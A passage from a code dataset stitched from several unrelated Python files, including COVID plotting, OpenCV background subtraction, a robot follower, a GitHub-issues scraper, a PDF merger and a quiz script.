jp.plot_daily( ax[0] , df_pl['Date'], df_pl['Daily Confirmed'] )\n ax[1] = jp.plot_daily( ax[1] , df_pl['Date'], df_pl['Daily Deaths'] )\n\n ax[0].set_title('US Daily Confirmed')\n ax[1].set_title('US Daily Deaths') \n ax[0].legend( ax[0].get_legend_handles_labels()[0][::-1] , ax[0].get_legend_handles_labels()[1] [::-1])\n\n \n # plot daily per state\n bool_last = df_state['Date'] == df_state['Date'].max()\n sorted_states = df_state[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_states.head(5) \n\n n_state = 12\n top_state = sorted_states['State'][:n_state].tolist()\n\n dates = df_pl['Date' ].unique() \n fig, ax = plt.subplots(n_state ,2,figsize=( full_w[0] ,n_state*3))\n\n n_correction = 1\n\n for i,country in enumerate( top_state ):\n df_pl = df_state[ df_state['State'] == country]\n \n bool_measure = df_pl['Measure'].notnull() \n measures= df_pl.loc[bool_measure,['Measure','Date']] \n \n jp.plot_daily( ax[i,0] , df_pl['Date'], df_pl['Daily Confirmed'], measures)\n jp.plot_daily( ax[i,1] , df_pl['Date'], df_pl['Daily Deaths'],measures)\n \n # add comparison lines \n ax[i,0].plot( dates[[0,len(dates)-1]], [1000,1000],'--',color='k', alpha = 0.5 )\n ax[i,1].plot( dates[[0,len(dates)-1]], [25,25],'--',color='k', alpha = 0.5 ) \n ax[i,0].set_ylabel( country )\n \n ax[0,0].set_title('Daily Confirmed')\n ax[0,1].set_title('Daily Deaths') \n\n ax[0,0].legend( ax[0,0].get_legend_handles_labels()[0][::-1] , \n ax[0,0].get_legend_handles_labels()[1] [::-1],\n bbox_to_anchor=(0.42, .7))\n\n ax[0,0].annotate('1000 cases',[dates[0],1000*1.5])\n ax[0,1].annotate('25 deaths',[dates[0],25*1.5])\n \n ax[0,0].annotate('Updated '+str( dates[-1] ), \n [dates[0], df_state['Daily Confirmed'].max()*(0.94-0.1)], \n color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_state_dailycases'\n if save_fig: \n jp.save_fig( figs_path, fig_name) \n \n # plot country map ------------------------------------------\n \n def move_scale_state( df, state_name, scaling_ratio, xy_movement): \n # get original polygons\n bool_state = df['STATE_NAME'] == state_name\n state_object = df.loc[bool_state,'geometry']\n state_geom = df.loc[bool_state,'geometry'].iloc[0] \n\n state_moved = shp.translate(state_geom, xy_movement[0], xy_movement[1]) \n centroid = state_moved.centroid\n state_scaled = shp.scale( state_moved, xfact=scaling_ratio, yfact=scaling_ratio, origin=centroid) \n state_object.iloc[0] = state_scaled\n df.loc[bool_state,'geometry'] = state_object\n \n return df\n data_path = os.path.join( base_path, 'geo_data\\states.shp' ) \n US = gpd.read_file(data_path) \n \n US = move_scale_state( US, 'Alaska', 0.4, [25,-31]) \n US = move_scale_state( US, 'Hawaii', 1.3, [35,6])\n\n US['average_increase']=0\n dates = df_state['Date'].sort_values().unique()\n\n for state in US['STATE_NAME'].unique(): \n \n in_state = df_state['State'] == state \n\n bool_date = df_state['Date'] == dates[-1]\n bool_prior = df_state['Date'] == dates[-7] \n \n if (np.sum(bool_date&in_state) > 0) & (np.sum(bool_prior&in_state) > 0):\n cases_date = df_state.loc[bool_date&in_state,'Confirmed'].values\n cases_prior = df_state.loc[bool_prior&in_state,'Confirmed'].values\n # print(cases_date, cases_prior) \n latest_cases = (cases_date-cases_prior)/7\n else:\n latest_cases = 2\n \n bool_US_state = US['STATE_NAME'] == state\n US.loc[bool_US_state,'average_increase'] = np.log(latest_cases)\n\n fig, ax = plt.subplots(1,1 ,figsize=half_w )\n\n wp = US.plot(column='average_increase', ax=ax, cmap='OrRd' );\n\n wp.set_xbound(-135,-66)\n 
wp.set_ybound(20,49.5) \n\n vmin = US['average_increase'].min()\n vmax = ( US['average_increase'].max() )\n \n sm = plt.cm.ScalarMappable(cmap='OrRd', norm=plt.Normalize(vmin=vmin, vmax=vmax)) \n \n sm._A = []\n cax = fig.add_axes([0.2, 0.25, 0.6, 0.03])\n cb = fig.colorbar(sm, cax=cax, orientation='horizontal')\n \n tick_array = [20,40,100,400,1000,4000,10000,20000,40000 ] \n log_cases = np.log( tick_array ) \n cb.set_ticks( log_cases ) \n cb.set_ticklabels( tick_array) \n cb.set_label(' Daily case increaes \\n (average over last 7 days)')\n\n ax.axis(\"off\")\n\n ax.annotate('Updated '+str( df_state['Date'].iloc[-1]), \n [-135,22 ], color=[.3,.3,.3], style='italic',fontsize=8)\n \n fig_name= 'covid_state_map' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # show all figures ----------------------------------\n if show_plot:\n plt.show() ","sub_path":"JHU_main.py","file_name":"JHU_main.py","file_ext":"py","file_size_in_byte":38207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"616260419","text":"import asyncio\r\n\r\n\r\nclass StickyDistFollower(object):\r\n\r\n def __init__(self, event_callback, log=None):\r\n self.__event_callback = event_callback\r\n self.__log_data = {}\r\n self.__locked = False\r\n self.__moving = False\r\n self.__log = log\r\n\r\n @asyncio.coroutine\r\n def log(self):\r\n# print('store_logs: %s' % self.__log_data)\r\n data = ','.join(map(str, self.__log_data.get('dists', [0,0,0])))\r\n data += ',' + self.__log_data.get('action', '') + \"\\n\"\r\n if self.__log:\r\n yield from self.__log.write(data)\r\n\r\n @asyncio.coroutine\r\n def __stop_moving(self):\r\n if self.__moving:\r\n self.__event_callback(action='down', type='key_up')\r\n self.__moving = False\r\n self.__log_data['action'] = 'down_end'\r\n\r\n\r\n @asyncio.coroutine\r\n def process_distances(self, distances):\r\n self.__log_data = {'dists': distances}\r\n min_dist = min(distances)\r\n max_dist = max(distances)\r\n print(min_dist)\r\n if min_dist > 1.5 or max_dist < 0.1:\r\n yield from self.__stop_moving()\r\n elif min_dist < 0.2:\r\n yield from self.__start_relocating(distances)\r\n elif min_dist < 1.5:\r\n yield from self.__start_following(distances)\r\n# print(\"finish proc dists\")\r\n yield from self.log()\r\n\r\n @asyncio.coroutine\r\n def __start_relocating(self, dists):\r\n yield from self.__stop_moving()\r\n \r\n print(\"<><><><><><><><><><><><><><><>\")\r\n if dists[0] < dists[2] and dists[2] >= 0.1:\r\n yield from self.__turn_left()\r\n elif dists[0] >= dists[2] and dists[0] >= 0.1:\r\n yield from self.__turn_right()\r\n\r\n @asyncio.coroutine\r\n def __start_following(self, dists):\r\n if dists[2] <= dists[0] and dists[1] - dists[2] > 0.05:\r\n yield from self.__turn_right()\r\n elif dists[2] > dists[0] and dists[1] - dists[0] > 0.05:\r\n yield from self.__turn_left()\r\n else:\r\n yield from self.__move_forward()\r\n\r\n @asyncio.coroutine\r\n def __move_forward(self):\r\n# if self.__locked:\r\n# return\r\n self.__log_data['action'] = 'down_start'\r\n self.__moving = True\r\n self.__event_callback(action='down', type='key_down')\r\n #asyncio.sleep(0.3)\r\n #self.__event_callback(action='up', type='key_up')\r\n\r\n @asyncio.coroutine\r\n def __turn_left(self):\r\n if self.__locked:\r\n return\r\n self.__log_data['action'] = 'left_start'\r\n yield from self.log()\r\n self.__locked = True\r\n self.__event_callback(action='left', type='key_down')\r\n yield from asyncio.sleep(0.15)\r\n self.__event_callback(action='left', 
type='key_up')\r\n self.__log_data['action'] = 'left_end'\r\n self.__locked = False\r\n\r\n @asyncio.coroutine\r\n def __turn_right(self):\r\n if self.__locked:\r\n return\r\n self.__log_data['action'] = 'right_start'\r\n yield from self.log()\r\n self.__locked = True\r\n self.__event_callback(action='right', type='key_down')\r\n yield from asyncio.sleep(0.15)\r\n self.__event_callback(action='right', type='key_up')\r\n self.__log_data['action'] = 'right_end'\r\n self.__locked = False\r\n","sub_path":"follow_strategy.py","file_name":"follow_strategy.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"420694013","text":"# Copyright 2013 National Technology & Engineering Solutions of Sandia, LLC (NTESS). \n# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government \n# retains certain rights in this software.\n#\n# This code does the actual parsing of csv files and matrix files\n# for VideoSwarm.\n#\n# S. Martin\n# 5/20/2018\n\nimport cherrypy\nimport csv\nimport numpy\n\n# this version can handle either a matrix of floats, or a vector of strings\ndef parse_mat_file(file):\n\n \"\"\"\n parses out a csv file into numpy array by column (data), the dimension meta data(dimensions),\n and sets attributes (attributes)\n :param file: csv file to be parsed\n :returns: attributes, dimensions, data\n \"\"\"\n\n cherrypy.log.error(\"Started VS generic matrix parser.\")\n\n # parse file using comma delimiter\n rows = [row for row in csv.reader(file.splitlines(), delimiter=\",\", doublequote=True,\n escapechar=None, quotechar='\"', quoting=csv.QUOTE_MINIMAL, skipinitialspace=True)]\n\n # fill a numpy matrix with matrix from file (assumes floats, uses strings otherwise)\n data = numpy.zeros((len(rows[0:]), len(rows[0])))\n string_data = []\n is_float = True\n for j in range(len(rows[0:])):\n try:\n data[j,:] = numpy.array([float(name) for name in rows[j]])\n except:\n is_float = False\n string_data.append([name for name in rows[j]])\n\n # set dimensions according to what was in the file\n dimensions = [dict(name=\"row\", end=int(data.shape[0])),\n dict(name=\"column\", end=int(data.shape[1]))]\n\n # attributes are the same for matrices and vectors\n if is_float:\n attributes = [dict(name=\"value\", type=\"float64\")]\n else:\n attributes = [dict(name=\"value\", type=\"string\")]\n data = string_data\n\n # for debugging:\n # cherrypy.log.error (str(data))\n # cherrypy.log.error (str(dimensions))\n # cherrypy.log.error (str(attributes))\n\n return attributes, dimensions, data","sub_path":"web-server/plugins/slycat-video-swarm/vs-parse-files.py","file_name":"vs-parse-files.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"286331471","text":"# Using redirect route instead of simple routes since it supports strict_slash\n# Simple route: http://webapp-improved.appspot.com/guide/routing.html#simple-routes\n# RedirectRoute: http://webapp-improved.appspot.com/api/webapp2_extras/routes.html#webapp2_extras.routes.RedirectRoute\nfrom webapp2_extras.routes import RedirectRoute\n\nfrom controllers import pages\nimport utils\n\n\n\nsecure_scheme = 'https'\n\n_routes = [\n\n RedirectRoute('/kelly', pages.KellyPage, name='Kelly', strict_slash=True),\n]\n\ndef get_routes():\n return _routes\n\n\ndef add_routes(app):\n if app.debug:\n secure_scheme = 'http'\n for r in _routes:\n 
app.router.add(r)\n","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"301065197","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 1 15:59:31 2019\n\n@author: lncl2\n\"\"\"\n# Less time taking 0.0933988094329834\n# good background subtraction\n\n\nimport numpy as np\nimport cv2 as cv\nimport imutils\nimport time\n\ncap = cv.VideoCapture('rtsp://admin:admin123@192.168.1.5:554/Streaming/Channels/901')\nfgbg = cv.createBackgroundSubtractorMOG2()\n\n(major_ver, minor_ver, subminor_ver) = (cv.__version__).split('.')\nif int(major_ver) < 3 :\n fps = cap.get(cv.cv.CV_CAP_PROP_FPS)\n print (\"Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}\".format(fps))\nelse :\n fps = cap.get(cv.CAP_PROP_FPS)\n print (\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}\".format(fps))\n #fps = fps//1 \n\nwhile(1):\n num_frames = fps;\n start = time.time()\n ret, frame = cap.read()\n fgmask = fgbg.apply(frame)\n text = \"Unoccupied\"\n \n #kernel = np.ones((5,5),np.uint8)\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE,(3,3))\n opening = cv.morphologyEx(fgmask, cv.MORPH_OPEN, kernel)\n closing = cv.morphologyEx(opening, cv.MORPH_CLOSE, kernel)\n dilation = cv.dilate(closing,kernel,iterations = 1)\n end = time.time()\n \n seconds = end - start\n \n print (\"Time taken : {0} seconds\".format(seconds))\n\n # Calculate frames per second\n fps = num_frames / seconds;\n print (\"Estimated frames per second : {0}\".format(fps))\n \n \n \n cnts = cv.findContours(dilation.copy(), cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n \n for c in cnts:\n cv.createBackgroundSubtractorMOG2()\n if cv.contourArea(c) < 1000:\n \n continue\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = \"Occupied\"\n \n \n cv.putText(frame, \"Roocv.createBackgroundSubtractorMOG()m Status: {}\".format(text), (10, 20),cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) \n a = cv.resize(dilation, ( 600, 800 ), interpolation = cv.INTER_CUBIC)\n b = cv.resize(frame, (600, 800 ), interpolation = cv.INTER_CUBIC)\n cv.imshow('Contour', b)\n cv.imshow('frame',a)\n \n if text==\"Occupied\":\n \n print (\"Motion detected\")\n else:\n print(\"No motion detected\")\n \n k = cv.waitKey(30) & 0xff\n if k == 27:\n break\ncap.release()\ncv.destroyAllWindows()\n\n\n\n\n## With status Occupied and Unoccupied MOG2\n","sub_path":"backgraound_subtraction/mog2_frame_time.py","file_name":"mog2_frame_time.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100928579","text":"from PyQt5.QtWidgets import (QWidget, QLabel, QLineEdit,\n QTextEdit, QGridLayout, QApplication, QPushButton,\n QHBoxLayout, QVBoxLayout, QFrame, QSplitter)\nfrom PyQt5.QtGui import QIcon, QFont, QPainter, QColor, QPen\nfrom PyQt5.QtCore import Qt, QRect\nfrom FactoryView import FactoryView\n\nclass MainWindow(QWidget):\n\n def __init__(self, parent = None):\n\n QWidget.__init__(self, parent)\n self.initUI()\n\n\n def initUI(self):\n\n left = QFrame(self)\n right = FactoryView(self)\n\n left.setFrameShape(QFrame.StyledPanel)\n right.setFrameShape(QFrame.StyledPanel)\n\n splitter1 = QSplitter(Qt.Horizontal)\n splitter1.addWidget(left)\n splitter1.addWidget(right)\n\n\n\n hbox1 = QHBoxLayout(self)\n hbox2 = 
QHBoxLayout(right)\n\n # factoryFloor = FactoryView(parent=right)\n\n hbox1.addWidget(splitter1)\n # hbox2.addWidget(factoryFloor)\n self.setLayout(hbox1)\n # right.setLayout(hbox2)\n\n self.setGeometry(300, 300, 400, 220)\n self.setWindowTitle('Tempo Factory Simulator')\n self.setWindowIcon(QIcon('res/tempo_automation_logo.png'))\n self.show()\n\n","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202961770","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-9-10 上午8:37\n# @Author : huiqin\n# @File : Interleaving.py\n# @Description : Class is for\n\nclass Solution(object):\n def isInterleave(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n if len(s1)+len(s2) != len(s3): return False\n\n dp = [[False for i in range(len(s2)+1)] for j in range(len(s1)+1)]\n dp[0][0] = True\n\n for i in range(1,len(s1)+1):\n dp[i][0] = dp[i-1][0] and s1[i-1]==s3[i-1]\n\n for j in range(1,len(s2)+1):\n dp[0][j] = dp[0][j-1] and s2[j-1]==s3[j-1]\n\n for i in range(1,len(s1)+1):\n for j in range(1,len(s2)+1):\n dp[i][j] = (dp[i-1][j] and s3[i+j-1]==s1[i-1]) or (dp[i][j-1] and s3[i+j-1]==s2[j-1])\n return dp[len(s1)][len(s2)]\n","sub_path":"CoreProgramming/DynamicPropgramming/Interleaving.py","file_name":"Interleaving.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"397087","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport usuarios.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuarios', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='diarista',\n name='comprovante',\n field=models.ImageField(default='diaristas/comprovante/', upload_to=usuarios.models.PathAndRename('/home/felipe/cleanup/media/diaristas/comprovante'), verbose_name='Comprovante de Resid\\xeancia'),\n ),\n migrations.AlterField(\n model_name='diarista',\n name='cpfoto',\n field=models.ImageField(default='diaristas/cpf/', upload_to=usuarios.models.PathAndRename('/home/felipe/cleanup/media/diaristas/cpf'), verbose_name='CPF'),\n ),\n migrations.AlterField(\n model_name='diarista',\n name='rgfoto',\n field=models.ImageField(default='diaristas/rg/', upload_to=usuarios.models.PathAndRename('/home/felipe/cleanup/media/diaristas/rg'), verbose_name='RG'),\n ),\n ]\n","sub_path":"usuarios/migrations/0002_auto_20170617_2332.py","file_name":"0002_auto_20170617_2332.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"429796997","text":"import wpilib\nfrom commandbased import CommandBasedRobot\n\nimport subsystems\n\nfrom commands.autonomous.autonomous import Autonomous\nfrom commands.gear.closegear import CloseGear\n\nimport operatorinput\n\nimport robotmap\n\n'''import network tables in order to setup network tables for\ncommunicating with camera process'''\n\nfrom networktables import NetworkTables\n\n# NetworkTables.initialize(server='roborio-2036-frc.local')\n\n\nclass Robot(CommandBasedRobot):\n \"\"\"Robot program base framework.\n\n Overridden init and periodic methods are called at appropriate\n times automatically.\n \"\"\"\n\n def robotInit(self):\n \"\"\"Robot initiializer. 
Initializes things such as all of the subsystems\n and operator input objects.\n\n Runs once during startup.\n \"\"\"\n subsystems.init()\n operatorinput.init()\n\n self.autonomous = Autonomous()\n\n \"\"\"Launch the child process for obtaining centroids of the\n vision targets. See the documentation in camera.py and at\n http://robotpy.readthedocs.io/en/stable/vision/roborio.html\"\"\"\n\n wpilib.CameraServer.launch('camera.py:main')\n\n print(\"Initialized robot\")\n\n def autonomousInit(self):\n \"\"\"Prepares the code for the autonomous period.\n \"\"\"\n CloseGear().start()\n\n self.autonomous.start()\n\n print(\"Autonomous initialized\")\n\n def autonomousPeriodic(self):\n \"\"\"Periodic code for the autonomous period.\n\n Called every 20ms or so.\n \"\"\"\n wpilib.command.Scheduler.getInstance().run()\n\n def teleopInit(self):\n \"\"\"Prepares the code for the tele-operated period.\n\n Runs once when remote control is activated\n \"\"\"\n self.autonomous.cancel()\n\n print(\"Tele-op initialized.\")\n\n def teleopPeriodic(self):\n \"\"\"Periodic code for the tele-operated period.\n\n Called every 20ms or so.\n \"\"\"\n wpilib.command.Scheduler.getInstance().run()\n\nif __name__ == '__main__':\n wpilib.run(Robot)\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"100825704","text":"\ndef main():\n st=set()\n y,x=0,0\n st.add((0,0))\n s=input()\n k=int(input())\n prev_update=0\n prev=0\n rem=0\n for ki in range(k):\n for si in s:\n if si=='L':x-=1\n if si=='R':x+=1\n if si=='U':y+=1\n if si=='D':y-=1\n st.add((y,x))\n cnt=len(st)\n update=cnt-prev\n prev=cnt\n if update==prev_update:\n rem=k-ki-1\n break\n prev_update=update\n\n ans=len(st)+prev_update*rem\n print(ans)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"1_contest/current/abc219/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"579816690","text":"import sys\n# import time\n\nimport os\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup, NavigableString # required for HTML and XML parsing # required for HTML and XML parsing: pip install beautifulsoup4\n\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\ndriver = webdriver.Chrome(executable_path=r'C:\\Users\\olegs\\Desktop\\gsoc_publisher\\chromedriver_win32\\chromedriver.exe',options=chrome_options)\n\n\nissues_url = \"https://github.com/deepmipt/DeepPavlov/issues\"\n\ndriver.get(issues_url)\nhtmlSource = driver.page_source\n\nnextSoups = []\nfor pageNum in range(10):\n driver.get(issues_url+f\"?page={pageNum}\")\n htmlSource2 = driver.page_source\n soup2 = BeautifulSoup(htmlSource2, features=\"html.parser\")\n nextSoups.append(soup2)\n\nsoup = BeautifulSoup(htmlSource, features=\"html.parser\")\ncontent_html = soup.find(\"div\", attrs={\"class\": \"repository-content\"})\n\ne = soup.find(\"div\", attrs={\"class\": \"bg-gray-light pt-3 hide-full-screen mb-5\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"position-relative js-header-wrapper \"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"position-relative js-header-wrapper\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": 
\"js-pinned-issues-reorder-container\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"paginate-container d-none d-sm-flex flex-sm-justify-center\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"footer container-xl width-full p-responsive\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"protip\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"paginate-container d-sm-none mb-5\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"Box-header d-flex flex-justify-between\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"ml-2 pl-2 d-none d-md-flex\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"ml-3 d-flex flex-justify-between width-full width-md-auto\"})\nif e:\n e.extract()\n\nc3s = []\nfor soup2 in nextSoups:\n for c in soup2.findAll(\"div\", attrs={\"aria-label\": \"Issues\"}):\n # print(type(c))\n for c2 in c.findAll(\"div\", attrs={\"class\": \"js-navigation-container js-active-navigation-container\"}):\n for c3 in c2.children:\n c3s.append(c3)\n\n\nfor c3 in c3s:\n soup.find(\"div\", \n attrs={\"class\": \"js-navigation-container js-active-navigation-container\"})\\\n .append(c3)\n # print(c3)\n\nsoup_pretty = str(soup)\n\nsoup_pretty = soup_pretty.replace('\"/deepmipt/DeepPavlov/issues', '\"https://github.com/deepmipt/DeepPavlov/issues')\nsoup_pretty = soup_pretty.replace('\"/users', '\"https://github.com/users')\n\nimport os\nos.makedirs(\"_includes\", exist_ok=True)\nwith open(\"_includes/gsoc_ideas.html\", 'w', encoding=\"utf-8\") as f:\n print(soup_pretty, file=f)\n\n","sub_path":"generate_ideas.py","file_name":"generate_ideas.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"254249540","text":"\"\"\"\nHolds global web application state and the WSGI handler.\n\nYou can run this script for a one-process webapp.\n\nFurther, you can pass in ``--check`` which will create the app and then exit\nmaking it easier to suss out startup and configuration issues.\n\n\"\"\"\n\nimport logging\nimport sys\n\nfrom waitress import serve\n\nfrom ichnaea.webapp.config import main, shutdown_worker\n\n\nLOGGER = logging.getLogger(\"ichnaea\")\n\n\n# Internal module global holding the runtime web app.\n_APP = None\n\n\ndef wsgi_app(environ, start_response):\n \"\"\"\n Actual WSGI application endpoint, used on the command line via:\n\n .. 
code-block:: bash\n\n bin/gunicorn -c python:ichnaea.webapp.gunicorn_settings \\\n ichnaea.webapp.app:wsgi_app\n\n At startup reads the app config and calls\n :func:`ichnaea.webapp.config.main` once to setup the web app stored\n in the :data:`ichnaea.webapp.app._APP` global.\n \"\"\"\n global _APP\n\n if _APP is None:\n _APP = main(ping_connections=True)\n if environ is None and start_response is None:\n # Called as part of gunicorn's post_worker_init\n return _APP\n\n return _APP(environ, start_response)\n\n\ndef worker_exit(server, worker):\n shutdown_worker(_APP)\n\n\ndef log_access_factory(wsgi_app):\n \"\"\"WSGI middleware for logging HTTP requests.\"\"\"\n\n def handle(environ, start_response):\n method = environ[\"REQUEST_METHOD\"]\n path = environ.get(\"PATH_INFO\", \"\")\n\n def log_response(status, headers, exc_info=None):\n content_length = \"\"\n for key, val in headers:\n if key.lower() == \"content-length\":\n content_length = \"(%s)\" % val\n break\n LOGGER.info(\"%s %s - %s %s\", method, path, status, content_length)\n return start_response(status, headers, exc_info)\n\n return wsgi_app(environ, log_response)\n\n return handle\n\n\nif __name__ == \"__main__\":\n if \"--check\" in sys.argv:\n main(ping_connections=False)\n else:\n serve(\n log_access_factory(main(ping_connections=True)), host=\"0.0.0.0\", port=8000\n )\n","sub_path":"ichnaea/webapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"182079572","text":"#w=int(input(\"enter\"))\n#s=0\n#while w>0:\n#\ts=s+w;\n#\tw=w-2;\n#print(s)\n#fibbo\ndef fibonacci(n):\n\tif(n<=1):\n\t\treturn n\n\telse:\n\t\treturn(fibonacci(n-1)+fibonacci(n-2))\nn=int(input(\"netre no of terms:\"))\nprint(\"fib series\")\nfor i in range(n):\n\tprint(fibonacci(i))\n","sub_path":"Series.py","file_name":"Series.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"598712233","text":"import PyPDF2\nimport glob\nimport datetime\n\n\ndef mergePDF(filesArr, result_filename):\n pdfFileObjArray = []\n for i in filesArr:\n pdfFileObj = PyPDF2.PdfFileReader(open(i, \"rb\"))\n pdfFileObjArray.append(pdfFileObj)\n pdfWriter = PyPDF2.PdfFileWriter()\n for i in pdfFileObjArray:\n for j in range(i.numPages):\n pdfWriter.addPage(i.getPage(j))\n pdfOutputFile = open(\"./MERGED DOCS HERE/\"+result_filename, 'wb')\n pdfWriter.write(pdfOutputFile)\n pdfOutputFile.close()\n\n\nif __name__ == \"__main__\":\n PdfArr = glob.glob('./DROP/*.pdf')\n print(\"{} Files found!!\".format(len(PdfArr)))\n x = {}\n for i in range(len(PdfArr)):\n x[chr(i+97)] = PdfArr[i]\n for i, j in x.items():\n print(i, \":\", j.split(\"\\\\\")[1])\n temp = []\n y = input(\n \"Enter letters of files to merge in required order(space seperated):\").lower().split()\n for i in y:\n temp.append(x.get(i))\n inp = input(\"Name the Merged File:\").replace(\" \", \"-\")\n result_filename = inp+\".pdf\"\n mergePDF(temp, result_filename)\n print(\"Hogaya Bhai,Hogaya Done!\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"20841297","text":"import numpy as np\n\n\nfrom openmdao.api import ExplicitComponent\n\n\nclass KKTComp(ExplicitComponent):\n\n def initialize(self):\n self.options.declare('NDOF', types=int)\n # self.options.declare('NEL', 
types=int)\n self.options.declare('A', types = np.ndarray)\n self.options.declare('f', types = np.ndarray)\n self.options.declare('constraints', types = np.ndarray)\n\n\n\n def setup(self):\n NDOF = self.options['NDOF']\n # NEL = self.options['NEL']\n constraints = self.options['constraints']\n self.add_input('Kglobal', shape=(NDOF, NDOF))\n self.add_output('K_temp', shape = (NDOF + len(constraints),NDOF + len(constraints)))\n self.add_output('f_temp', shape = (NDOF + len(constraints)))\n # self.declare_partials('d', 'Kglobal', method ='fd')\n col_ind = np.arange(NDOF*NDOF)\n # for rows\n arange = np.arange(NDOF)\n rows = np.tile(arange, NDOF)\n cols = np.repeat(arange, NDOF)\n row_ind = np.block([[rows], [cols]])\n row_ind = np.ravel_multi_index(row_ind, (NDOF + len(constraints),NDOF + len(constraints)))\n self.declare_partials('K_temp', 'Kglobal', val=1., rows=row_ind, cols=col_ind)\n\n\n def compute(self, inputs, outputs):\n A = self.options['A']\n f = self.options['f']\n constraints = self.options['constraints']\n nc = len(constraints)\n Kglobal = inputs['Kglobal']\n\n outputs['K_temp'] = np.block([[Kglobal, A.T],[A, np.zeros((nc,nc))]])\n outputs['f_temp'] = np.append(f, constraints)\n","sub_path":"FEA-solver/KKT_comp.py","file_name":"KKT_comp.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"633532675","text":"\"\"\"\nO Código deve realizar a criação de uma prova com cinco. perguntas (para simular escrevar qualquer coisa que tenha\nresposta sim ou nao, cada pergunta pode ter duas respostas.\nSe o Aluno escolher sim o questionario deve somar 2 pontos.\nO Aluno, caso contrario nao deve somar, ao final o sistema deve mostrar o total da nota alcanda pelo aluno\n\"\"\"\n\n\n\n\nnm = input(\"Digite o nome do Aluno: \").title()\n\nprint(\"\\nA Capital do Paraná é CURITIBA?\")\npr1 = str(input(\"\\n***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr1 == 'SIM':\n r1 = 2\nelse:\n r1 = 0\nprint(\"\\n SEGUNDA PERGUNTA! VALENDOOOOOO!\")\nprint(\"\\nUma pais da Europa! Essa Frase foi dita pelo FAUSTAO?\")\npr2 = str(input(\"***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr2 == 'SIM':\n r2 = 2\nelse:\n r2 = 0\n\n\nprint(\"\\n TERCEIRA PERGUNTA!!! VALENDOOOOO!!!\")\nprint(\"\\nTá pegando Fogo Bicho! - Essa frase foi dita pelo Gugu?\")\npr3 = str(input(\"***** Digite 